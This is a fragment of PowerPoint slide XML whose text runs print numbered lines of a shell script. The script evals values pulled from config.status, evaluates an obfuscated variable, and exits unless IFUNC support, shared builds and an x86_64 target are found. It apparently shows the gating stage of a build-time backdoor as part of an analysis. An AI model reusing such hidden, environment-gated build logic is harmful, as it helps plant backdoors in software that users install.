                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^CC=\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^GCC=\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^build=\'x86_64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>enable_shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=\'yes\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
17 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>enable_static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>gl_path_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=\' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
19 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>zrKccj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>21 exit 0
22 fi
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> HAVE_FUNC_ATTRIBUTE_IFUNC 1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>24 exit 0
25 fi
26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> test "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>x$enable_shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>" != "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
27 exit 0
28 fi
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>29 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$build" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Eq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "^x86_64" &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$build" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Eq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
